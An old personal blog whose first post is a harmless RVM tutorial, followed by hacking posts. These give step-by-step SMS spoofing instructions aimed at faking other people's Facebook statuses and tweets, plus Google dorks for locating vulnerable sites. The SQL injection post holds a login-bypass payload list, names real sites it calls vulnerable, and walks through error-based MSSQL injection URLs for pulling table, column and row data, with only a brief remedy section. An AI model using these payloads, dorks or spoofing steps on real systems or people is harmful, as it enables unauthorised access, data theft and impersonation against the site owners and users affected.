Welcome to my Blog.

Thursday, 8 March 2012

RVM Ruby Version Manager

It was the time when I was struck with burden of different ruby version projects. I had installed Ruby 1.9.2 and Rails 3.2.1.
But Thank God, RVM came to rescue.If the project is made on rails 2.3.8 then you can`t run it on rails 3.2.1 simply because it has changed a lot form 2.x to 3.x (versioning problem).

RVM i.e. Ruby version manager, manages different version of ruby. So if I want to run an old project then I can switch to old Ruby version i.e. 1.8.7 and can easily run an old project.

In RVM there comes gemset. Gemset is the list of gems that is required to run the project and it also provides some of the run time.RVM efficiently manages GEMSET for each Ruby version.

For example if I want to run an old ruby project then I would switch the ruby version (my default is ruby 1.9.2) to 1.8.7 by the following command.

"rvm use 1.8.7" # this will switch to ruby 1.8.7

If I want ruby 1.8.7 as my default ruby then I can issue the following command in my console.

"rvm use 1.8.7 --default"

As I told each ruby maintains its own individual gemset. So in order to create a gemset I can issue following command.

"rvm create gemset rails2" # remember that I have switched to ruby 1.8.7 , so this gemset will go in that ruby version only. So rails2 for ruby 1.8.7

Once the gemset is created I can install gems in that gem set, BUT first switch to that particular gemset .

"rvm gemset use rails2" # switching to gemset rails2 for ruby 1.8.7

Now you can install all the gems needed for running a ruby on rails project.

Remember there is a gemset called global gemset. If you dont mention that in which gemset you want to install the gems then all the gems will get installed in the global gem set.

You can create many gemset as you wish in the particular version of ruby.

using ruby 1.8.7 with gemset rails2 I can issue a command like this.

"rvm use 1.8.7@rails2 --default" # I`ve kept this default as I wanna run an old RoR project.

So RVM Ruby Version Manager is really really a great tool for efficiently manage ruby versions. And I encourage you all to use it. In fact it is the best method and good practice too.

Saturday, 8 October 2011

RSS Really Simple Syndicate -- Real World Format.

Hey there I`ve written a blog on RSS - Real world fomat. I hope this will get you started with RSS. Below is the link.

Click Here

Monday, 22 August 2011

Now you too can spoof SMS, learn how..

What is SMS spoofing ?

According to wikipedia.org, SMS spoofing is a relatively new technology which uses the short message service (SMS), available on most mobile phones and personal digital assistants, to set who the message appears to come from by replacing the originating mobile number (Sender ID) with alphanumeric text. Spoofing has both legitimate uses (setting the company name from which the message is being sent, setting your own mobile number, or a product name) and illegitimate uses (such as impersonating another person, company, product) .

Below I share how you too can send a spoofed SMS. (Just follow the steps)

1) Visit the website http://www.lleida.net , below is the snapshot.

2) Click on English as shown above.

3) Click on “FREE ACCOUNT” at left menu panel.

4) Register your free account by filling proper details.(Please provide your original mobile number and Email-ID during registration)

5) You will get a SMS notification on your mobile number along with the account details mailed to you on your E-mail.

6) Log-in to your E-mail, you will get your Username and Password for free account. Click on the link WEB-VERSION given in the same E-mail.

7) The WEB-VERSION will appear as below

8) Log- In with the Username and Password that was provided you in your E-mail.

9) Below is the snapshot that explains you rest.

10) You get 20 credits initially i.e. you can send 60 SMS of 144 characters.

By the help of such service you can easily change the status of any FACEBOOK user who had registered their mobile device with facebook . You can also fake tweet of any person you like on tweeter.

This post was just for learning purpose, I bear no responsibility if some mischief is done. In some countries SMS spoofing is illegal so I request you all not to use this service in banned countries.

Sunday, 31 July 2011

Google Reveals A Lot (Google-dorks)

Google helps in creating complex search engine queries in order to filter information related to computer security through large amounts of search results.

In its malicious format, it can be used to detect websites that are vulnerable to numerous exploits and vulnerabilities. It can also locate private, sensitive information about others, such as credit card numbers, social security numbers and even PASSWORDS.

Below I had shown that how you can use GOOGLE to search for a particular result.

(Click on image to enlarge)

Filetype operator:

This searches for a particular file type format. This is as shown below.

Site operator:

This will search in a particular site i.e. this type of search is bounded for a particular site. This is as shown below.

Inurl operator:

This will search for the result set which appears in the URL i.e. Uniform Resource Locator. Below is an example.

Server Versioning:

Knowing the server on which the website runs on(Also called as Server versioning). Below is an example.
query for google search:

intitle:index.of “server at”

Find FTP logs:

As we know there`s often a FTP log which remains in plain text format, we can now even search for that logs that reveals a lot. Below is an example.

Directory Searching:

This way you can search for some of the directories of websites. Below is an example for this.

Particular Directory Listing:

Below is an example of how you will list a directory of the file extensions you want.

Recommended References:

http://www.i-hacked.com/content/view/23/42/

http://www.ngohaianh.info/data/GoogleHacks.pdf

http://www.exploit-db.com/google-dorks/

Tuesday, 26 July 2011

Two worst practices that ASP.NET developers make. (Practical SQL INJECTION And REMEDY)

Web-Developers are under tight schedule to deliver products on time, thus security aspect of the web-application is often an afterthought and usually delivered later.

Here, I discuss two of the most common WORST practices that ASP.NET developers make and also the remedy to prevent them.

1. Default usernames and passwords (username:admin & password:admin ) in Admin Login portals. (Authentication By-pass in Security Analyst`s Terms)

2. Lack of secure programming.(SQL Injection in SA`s terms)

Now, I would like to share the first part of our discussion.
I just googled by typing the following in the search bar.

“.in inurl:admin_login.aspx”

“.in inurl:adminlogin.asp”“.in inurl:admin/login.asp”

We can see that there are about one-tenth of million results that are displayed in just no time.

I visited one of the Admin login portal as show below.( I have not mention the complete URL of website to maintain its privacy)

Now, the real magic happens, I entered Username as admin and password as ‘or’0’=’0.(Magic Quote in Security Analyst`s view) And below is the snap of what we can mess with.

A list of such magic quotes can be as following, which you can enter in the password field (to confuse the database).

‘ or ’1'=’1 ‘ or 1=1– hi’ or 1=1 – ‘or’1=1'

‘ or ‘x’='x ‘ or 0=0 – ” or “x”=”x ‘) or (‘x’='x

” or 0=0 – or 0=0 – ” or 1=1-- or 1=1–

‘ or 0=0 # ” or 0=0 # ‘ or a=a– ” or “a”=”a

or 0=0 # ‘ or ‘x’='x ‘) or (‘a’='a “) or (“a”=”a

hi” or “a”=”a hi” or 1=1 – admin password

This type of vulnerabilities is generally found in some colleges and some academic websites and I am sure that none of the web-developer will be happy if such things happen.

__________________________________________________________________

LOGIC BEHIND MAGIC QUOTES:
(Why they allows us to login in this manner)

We learnt in our academics the concept of the truth tables i.e. the OR gates AND gates etc. Databases uses the same concept, they just evaluates the true result and gives us access to the secure page. I mean to say that 1 or 1= 1 (that is what we learnt in OR gates) or we can say that true or true=true which in turn evaluates to true result.

___________________________________________________________________

If any of these websites allows us to upload files/malicious scripts on the website then certainly, all the websites which are hosted on such server are also prone to such things. And the process of finding websites hosted on to the same server is called as SERVER ROOTING. Any one can easily gather important information hosted on various websites on the same server and can also DEFACE them.

About 20% of the total websites are found to be insecure in such manner. Even some of the Government Firm`s website are found to be insecure this way.

Below I share some of the vulnerable links that I found and there by I bear no responsibility if some mischief is done by YOU, this is strictly for knowledge purpose.

http://www.amityedu.net/admin

http://www.socet.edu.in/admin

http://www.mallikasherawatwow.com

http://globaloiljobs.com/admin_login.asp

www.iiae.in/admin_login.asp

www.anand.best4service.net/admin/login/adminLogin.aspx

www.ic.peopletree.edu.in/admin_login

In fact you can find about hundreds of such sites.

Now, let’s look on the second part of our discussion.

Those ASP websites which looks like www.somewebsite.com/page.asp?id=123 are more prone to the SQL INJECTION . I googled by typing “.in .pak .uk inurl:asp?id” in search bar and found the following result.(off-course you can use any of the google`s dork to search)

Below is the complete process ,

STEPS:

Step:1 find something like id=7 (As shown above using google dork)

Step:2 apply ' (single quote) to the end of the URL to check for error. (If page loads then the site is not vulnerable)

Example: http://www.someweb.com/page.aspx?movid=123’

Step:3 http://www.someweb.com/page.aspx?movid=123 and 1=convert(int,(select top 1 table_name from information_schema.tables)) --

Step:4 http://www.someweb.com/page.aspx?movid=123 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('<table_name>','<table_name>'))) --

Step:5 http://www.someweb.com/page.aspx?movid=123 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='<table_name>' ))

http://www.someweb.com/page.aspx?movid=123 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='<table_name>' and column_name not in('<column_name>','<column_name>')))

Step:6 http://www.someweb.com/page.aspx?movid=123 and 1=convert(int,(select top 1 <column_name> from <table_name> )) –

How to find Tables and Columns in a vulnerable website ?

The question arises is that “how will you find the table name?” well I have nice solution for that too.

Follow the steps to know the architecture of the tables and database. We can know the table name and the column name by performing these steps.

Ø To do this, the attacker uses the 'having' clause of the 'select' statement in username field as shown above(Login Portals):

Username: ' having 1=1—

This provokes the following error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

/process_login.asp, line 35

Ø So the attacker now knows the table name and column name of the first column in the query. They can continue through the columns by introducing each field into a 'group by' clause, as follows:

Username: ' group by users.id having 1=1—

(Which produces the error…)

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

/process_login.asp, line 35

Ø Eventually the attacker arrives at the following 'username':

Username: ' group by users.id, users.username, users.password, users.privs having

1=1--

… Which produces no error, and is functionally equivalent to:

select * from users where username = ''

Ø So in this way the attacker now knows that the query is referencing only the 'users' table, and is using the columns 'id, username, password, privs', are in that order.

Although the above SQL INJECTION is rare now a days but is still existing.

SNAP:

REMEDY:

1. Filter out character like single quote, double quote, slash, back slash, semi colon, extended character like NULL, carry return, new line, etc, in all strings from:

- Input from users

- Parameters from URL
- Values from cookie

2. For numeric value, convert it to an integer before parsing it into SQL statement. Or using ISNUMERIC to make sure it is an integer.

1. Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab.

2. Delete stored procedures that you are not using like:

master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask

Recommended References:

Protect from SQL Injection in ASP.NET

http://msdn.microsoft.com/en-us/library/ff648339.aspx

One of the earliest works on SQL Injection we have encountered should be the paper from Rain Forest Puppy about how he hacked PacketStorm.

http://www.wiretrip.net/rfp/p/doc.asp?id=42&iface=6

Great article on gathering information from ODBC error messages:

http://www.blackhat.com/presentations/win-usa-01/Litchfield/BHWin01Litchfield.doc

A good summary of SQL Injection on various SQL Server on:

http://www.owasp.org/asac/input_validation/sql.shtml

Senseport's article on reading SQL Injection:

http://www.sensepost.com/misc/SQLinsertion.htm